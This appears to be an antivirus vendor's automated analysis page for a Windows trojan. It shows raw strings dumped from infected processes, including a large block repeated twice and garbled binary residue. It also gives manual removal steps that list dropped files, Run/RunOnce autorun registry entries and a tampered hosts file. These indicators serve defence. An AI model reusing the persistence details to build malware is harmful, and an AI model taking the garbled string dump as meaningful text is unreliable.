..X...( ..z.[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}....
.....0..0...U.......0.0...U...........0...U.%..0... .......0...U......
..J!~...}....^].....0... .....0......0=..U...60402.0...,hXXp://crl.god
addy.com/repository/gdroot.crl0J..U. .C0A0?..`.H...m....000... .......
."hXXp://crl.godaddy.com/repository/0...*.H...............f...gb.dI..F
.72.$.......?/.....5.9-F.=...c....c..Wg.U......j0....A..[O.A>".<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

iexplore.exe_1748:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

OPLKIDMWLL.exe_2892_rwx_003C0000_00003000:

2.Cj3

iexplore.exe_4064:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

UBWBZWLKRG.exe_948_rwx_0013C000_00004000:

%Fkj^

%Dkj^

u.kj^

-.kj^

UBWBZWLKRG.exe_948_rwx_003B0000_00010000:

2.lj3

.iDjj

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

c4fa995d7ed1670ba8f720242f87dde6.tmp:3404
dw.exe:3584
DOCPSADOPK.exe:3808
%original file name%.exe:1796
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\itdownload.dll (1489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Windows\System32\drivers\etc\hosts (1 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe (243 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe (233 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe.config (1 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe.config (1 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe (833 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (844 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (844 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UDAF0.tmp\c4fa995d7ed1670ba8f720242f87dde6.tmp (1622 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"DOCPSADOPK.exe" = "%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"UBWBZWLKRG.exe" = "%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe"
Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.MSIL.DOTHETUK.jez_c4fa995d7e

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.MSIL.DOTHETUK.jez_c4fa995d7e

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet